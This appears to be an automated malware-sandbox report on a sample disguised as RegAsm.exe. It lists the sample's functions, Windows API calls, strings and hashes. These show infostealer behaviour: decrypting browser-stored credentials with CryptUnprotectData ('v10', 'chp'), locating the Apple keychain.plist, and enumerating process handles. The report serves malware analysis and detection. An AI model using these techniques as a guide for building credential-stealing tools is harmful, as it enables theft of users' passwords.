43b2f9 40097 423330 11 API calls 40013->40097 40015 43b30b 40098 423330 11 API calls 40015->40098 40017 43b325 40099 423399 11 API calls 40017->40099 40019 43b332 40100 4233ae 11 API calls 40019->40100 40021 43b354 40101 423399 11 API calls 40021->40101 40023 43b364 40102 43a82f 16 API calls 40023->40102 40025 43b370 40103 42db80 162 API calls 40025->40103 40027 43b380 40104 438c4e 162 API calls 40027->40104 40029 43b39e 40105 423399 11 API calls 40029->40105 40031 43b3ae 40106 43a76c 21 API calls 40031->40106 40033 43b3c3 40107 423399 11 API calls 40033->40107 40035->39856 40036->39858 40037->39859 40039 43a6f5 40038->40039 40040 43a765 40038->40040 40039->40040 40127 42a115 40039->40127 40040->39870 40047 4397fd memset 40040->40047 40044 43a73d 40044->40040 40045 42a115 146 API calls 40044->40045 40045->40040 40046->39865 40047->39873 40048->39870 40049->39888 40050->39877 40051->39881 40052->39878 40053->39882 40054->39886 40055->39890 40056->39892 40057->39895 40058->39902 40059->39901 40060->39906 40061->39914 40062->39899 40063->39907 40064->39910 40065->39913 40066->39913 40067->39922 40068->39925 40069->39930 40070->39934 40071->39942 40072->39949 40073->39956 40074->39970 40075->39977 40076->39994 40077->39994 40078->39994 40079->39990 40080->39997 40081->40002 40082->39975 40083->39975 40084->39975 40085->39973 40086->39980 40087->39983 40088->39986 40089->39991 40090->39996 40091->39999 40092->40003 40093->40009 40094->40010 40095->40009 40096->40013 40097->40015 40098->40017 40099->40019 40100->40021 40101->40023 40102->40025 40103->40027 40104->40029 40105->40031 40106->40033 40107->39914 40108->39941 40109->39936 40110->39943 40111->39946 40112->39952 40113->39958 40114->39927 40115->39935 40116->39940 40117->39944 40118->39954 40119->39957 40120->39963 40121->39958 40122->39966 40123->39968 40124->39914 40125->39919 40126->39870 40128 42a175 40127->40128 40130 42a122 40127->40130 40128->40040 40133 42b13b 146 API calls 40128->40133 40130->40128 40131 42a115 146 API calls 40130->40131 40134 43a174 40130->40134 40158 42a0a8 146 API calls 40130->40158 40131->40130 40133->40044 40148 43a196 40134->40148 40149 43a19e 40134->40149 40135 43a306 40135->40148 40172 4388c4 14 API calls 40135->40172 40138 42a115 146 API calls 40138->40149 40139 415a91 memset 40139->40149 40140 43a642 40140->40148 40177 4169a7 11 API calls 40140->40177 40144 43a635 40176 42c02e memset 40144->40176 40148->40130 40149->40135 40149->40138 40149->40139 40149->40148 40159 42ff8c 40149->40159 40167 4165ff 11 API calls 40149->40167 40168 439504 13 API calls 40149->40168 40169 4312d0 146 API calls 40149->40169 40170 42be4c memcpy memcpy memcpy memset memcpy 40149->40170 40171 43a121 11 API calls 40149->40171 40151 42bf4c 14 API calls 40153 43a325 40151->40153 40152 4169a7 11 API calls 40152->40153 40153->40140 40153->40144 40153->40148 40153->40151 40153->40152 40154 42b5b5 memset memcpy 40153->40154 40173 42b63e 14 API calls 40153->40173 40174 4165ff 11 API calls 40153->40174 40175 42bfcf memcpy 40153->40175 40154->40153 40158->40130 40178 43817e 40159->40178 40161 42ff99 40162 42ffe3 40161->40162 40163 42ffd0 40161->40163 40166 42ff9d 40161->40166 40183 4169a7 11 API calls 40162->40183 40182 4169a7 11 API calls 40163->40182 40166->40149 40167->40149 40168->40149 40169->40149 40170->40149 40171->40149 40172->40153 40173->40153 40174->40153 40175->40153 40176->40140 40177->40148 40179 438187 40178->40179 40181 438192 40178->40181 40184 4380f6 40179->40184 40181->40161 40182->40166 40183->40166 40186 43811f 40184->40186 40185 438164 40185->40181 40186->40185 40189 437e5e 40186->40189 40212 4300e8 memset memset memcpy 40186->40212 40213 437d3c 40189->40213 40191 437ea9 40192 437eb3 40191->40192 40198 437f22 40191->40198 40228 41f432 40191->40228 40192->40186 40195 437f06 40239 415c56 11 API calls 40195->40239 40197 437f95 40240 415c56 11 API calls 40197->40240 40199 437f7f 40198->40199 40200 432d4e 3 API calls 40198->40200 40199->40197 40201 43802b 40199->40201 40200->40199 40241 4165ff 11 API calls 40201->40241 40204 438054 40242 437371 137 API calls 40204->40242 40207 43806b 40208 438094 40207->40208 40243 42f50e 137 API calls 40207->40243 40209 437fa3 40208->40209 40244 4300e8 memset memset memcpy 40208->40244 40209->40192 40245 41f638 103 API calls 40209->40245 40212->40186 40214 437d69 40213->40214 40217 437d80 40213->40217 40246 437ccb 11 API calls 40214->40246 40216 437d76 40216->40191 40217->40216 40218 437da3 40217->40218 40221 437d90 40217->40221 40220 438460 133 API calls 40218->40220 40224 437dcb 40220->40224 40221->40216 40250 437ccb 11 API calls 40221->40250 40222 437de8 40249 424f26 122 API calls 40222->40249 40224->40222 40247 444283 13 API calls 40224->40247 40226 437dfc 40248 437ccb 11 API calls 40226->40248 40229 41f54d 40228->40229 40235 41f44f 40228->40235 40230 41f466 40229->40230 40280 41c635 memset memset 40229->40280 40230->40195 40230->40198 40235->40230 40237 41f50b 40235->40237 40251 41f1a5 40235->40251 40276 41c06f memcmp 40235->40276 40277 41f3b1 89 API calls 40235->40277 40278 41f398 85 API calls 40235->40278 40237->40229 40237->40230 40279 41c295 85 API calls 40237->40279 40239->40192 40240->40209 40241->40204 40242->40207 40243->40208 40244->40209 40245->40192 40246->40216 40247->40226 40248->40222 40249->40216 40250->40216 40252 41bc3b 100 API calls 40251->40252 40253 41f1b4 40252->40253 40254 41edad 85 API calls 40253->40254 40261 41f282 40253->40261 40255 41f1cb 40254->40255 40256 41f1f5 memcmp 40255->40256 40257 41f20e 40255->40257 40255->40261 40256->40257 40258 41f21b memcmp 40257->40258 40257->40261 40259 41f326 40258->40259 40262 41f23d 40258->40262 40260 41ee6b 85 API calls 40259->40260 40259->40261 40260->40261 40261->40235 40262->40259 40263 41f28e memcmp 40262->40263 40265 41c8df 55 API calls 40262->40265 40263->40259 40264 41f2a9 40263->40264 40264->40259 40267 41f308 40264->40267 40268 41f2d8 40264->40268 40266 41f269 40265->40266 40266->40259 40269 41f287 40266->40269 40270 41f27a 40266->40270 40267->40259 40274 4446ce 11 API calls 40267->40274 40271 41ee6b 85 API calls 40268->40271 40269->40263 40272 41ee6b 85 API calls 40270->40272 40273 41f2e0 40271->40273 40272->40261 40275 41b1ca memset 40273->40275 40274->40259 40275->40261 40276->40235 40277->40235 40278->40235 40279->40229 40280->40230 40281 41493c EnumResourceNamesW 40282 44660a 40285 4465e4 40282->40285 40284 446613 40286 4465f3 __dllonexit 40285->40286 40287 4465ed _onexit 40285->40287 40286->40284 40287->40286

                                                                                Executed Functions

                                                                                Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 353->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040DDAD
                                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                  • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                • CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
                                                                                • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                • DuplicateHandle.KERNEL32(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                • memset.MSVCRT ref: 0040DF5F
                                                                                • CloseHandle.KERNEL32(C0000004), ref: 0040DF92
                                                                                • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                • CloseHandle.KERNEL32(00000104), ref: 0040DFF2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                • API String ID: 2018390131-3398334509
                                                                                • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                  • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                  • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                • GetDiskFreeSpaceW.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                                                                                • String ID:
                                                                                • API String ID: 2947809556-0
                                                                                • Opcode ID: 940d27dee81e78af7b1dcfc54f007828992184dafba41df18b595ae7ea53f8f2
                                                                                • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                • Opcode Fuzzy Hash: 940d27dee81e78af7b1dcfc54f007828992184dafba41df18b595ae7ea53f8f2
                                                                                • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                Function 00404423 Relevance: 3.1, APIs: 2, Instructions: 51encryptionCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Load$CryptDataDirectoryFreeSystemUnprotectmemsetwcscatwcscpy
                                                                                • String ID:
                                                                                • API String ID: 1945712969-0
                                                                                • Opcode ID: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                                                • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                • Opcode Fuzzy Hash: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                                                • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                • FindNextFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: FileFind$FirstNext
                                                                                • String ID:
                                                                                • API String ID: 1690352074-0
                                                                                • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0041898C
                                                                                • GetSystemInfo.KERNEL32(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: InfoSystemmemset
                                                                                • String ID:
                                                                                • API String ID: 3558857096-0
                                                                                • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                                Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 42 44558e-445594 call 444b06 4->42 43 44557e-445580 call 4136c0 4->43 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 45 445823-445826 14->45 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 52 445879-44587c 18->52 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 87 445685 21->87 88 4456b2-4456b5 call 40b1ab 21->88 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 138 44592d-445945 call 40b6ef 24->138 139 44594a 24->139 37 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->37 38 445b29-445b32 28->38 157 4459d0-4459e8 call 40b6ef 29->157 158 4459ed 29->158 30->21 41 445609-44560d 30->41 31->30 182 445b08-445b15 call 40ae51 37->182 53 445c7c-445c85 38->53 54 445b38-445b96 memset * 3 38->54 41->21 50 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->50 42->3 66 445585-44558c call 41366b 43->66 55 44584c-445854 call 40b1ab 45->55 56 445828 45->56 154 445665-445670 call 40b1ab 50->154 155 445643-445663 call 40a9b5 call 4087b3 50->155 67 4458a2-4458aa call 40b1ab 52->67 68 44587e 52->68 63 445d1c-445d25 53->63 64 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->64 69 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->69 70 445b98-445ba0 54->70 55->13 71 44582e-445847 call 40a9b5 call 4087b3 56->71 76 445fae-445fb2 63->76 77 445d2b-445d3b 63->77 159 445cf5 64->159 160 445cfc-445d03 64->160 66->42 67->19 85 445884-44589d call 40a9b5 call 4087b3 68->85 249 445c77 69->249 70->69 86 445ba2-445bcf call 4099c6 call 445403 call 445389 70->86 141 445849 71->141 93 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 77->93 94 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 77->94 146 44589f 85->146 86->53 103 44568b-4456a4 call 40a9b5 call 4087b3 87->103 106 4456ba-4456c4 88->106 165 445d67-445d6c 93->165 166 445d71-445d83 call 445093 93->166 196 445e17 94->196 197 445e1e-445e25 94->197 148 4456a9-4456b0 103->148 120 4457f9 106->120 121 4456ca-4456d3 call 413cfa call 413d4c 106->121 120->6 174 4456d8-4456f7 call 40b2cc call 413fa6 121->174 138->139 139->23 141->55 146->67 148->88 148->103 154->106 155->154 157->158 158->28 159->160 171 445d05-445d13 160->171 172 445d17 160->172 176 445fa1-445fa9 call 40b6ef 165->176 166->76 171->172 172->63 206 4456fd-445796 memset * 4 call 409c70 * 3 174->206 207 4457ea-4457f7 call 413d29 174->207 176->76 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->38 201->182 220 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->220 239 445e62-445e69 202->239 240 445e5b 202->240 219 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->219 206->207 248 445798-4457ca call 40b2cc call 409d1f call 409b98 206->248 207->10 219->76 253 445f9b 219->253 220->182 239->203 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 264 445f4d-445f5a call 40ae51 245->264 248->207 265 4457cc-4457e5 call 4087b3 248->265 249->53 253->176 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->219 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                APIs
                                                                                • memset.MSVCRT ref: 004455C2
                                                                                • wcsrchr.MSVCRT ref: 004455DA
                                                                                • memset.MSVCRT ref: 0044570D
                                                                                • memset.MSVCRT ref: 00445725
                                                                                  • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                  • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                  • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                  • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                                                                                  • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                  • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                                                                                • memset.MSVCRT ref: 0044573D
                                                                                • memset.MSVCRT ref: 00445755
                                                                                • memset.MSVCRT ref: 004458CB
                                                                                • memset.MSVCRT ref: 004458E3
                                                                                • memset.MSVCRT ref: 0044596E
                                                                                • memset.MSVCRT ref: 00445A10
                                                                                • memset.MSVCRT ref: 00445A28
                                                                                • memset.MSVCRT ref: 00445AC6
                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                  • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                  • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                  • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                  • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                                  • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                                • memset.MSVCRT ref: 00445B52
                                                                                • memset.MSVCRT ref: 00445B6A
                                                                                • memset.MSVCRT ref: 00445C9B
                                                                                • memset.MSVCRT ref: 00445CB3
                                                                                • _wcsicmp.MSVCRT ref: 00445D56
                                                                                • memset.MSVCRT ref: 00445B82
                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                  • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                • memset.MSVCRT ref: 00445986
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AttributesCloseCreateFolderHandlePathSizeSpecial_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                                                                                • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                • API String ID: 381723030-3798722523
                                                                                • Opcode ID: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                                                • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                • Opcode Fuzzy Hash: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                                                • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                                                Function 0041276D Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 149COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                  • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                  • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                • SetErrorMode.KERNEL32(00008001), ref: 00412799
                                                                                • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Library$EnumErrorFreeHandleLoadMessageModeModuleResourceTypes
                                                                                • String ID: $/deleteregkey$/savelangfile
                                                                                • API String ID: 1442760552-28296030
                                                                                • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                                                Function 0040B6EF Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 388fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040B71C
                                                                                  • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                  • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                • wcsrchr.MSVCRT ref: 0040B738
                                                                                • memset.MSVCRT ref: 0040B756
                                                                                • memset.MSVCRT ref: 0040B7F5
                                                                                • CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040B838
                                                                                • memset.MSVCRT ref: 0040B851
                                                                                • memset.MSVCRT ref: 0040B8CA
                                                                                • memcmp.MSVCRT ref: 0040B9BF
                                                                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                  • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                • memset.MSVCRT ref: 0040BB53
                                                                                • memcpy.MSVCRT ref: 0040BB66
                                                                                • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memset$Freewcsrchr$CloseCreateCryptDataFileHandleLibraryLocalUnprotectmemcmpmemcpywcscpy
                                                                                • String ID: chp$v10
                                                                                • API String ID: 229402216-2783969131
                                                                                • Opcode ID: 0f77db0472bd63cf26258024439ab2a975461d6804070ba6b678b1f2ee2b0392
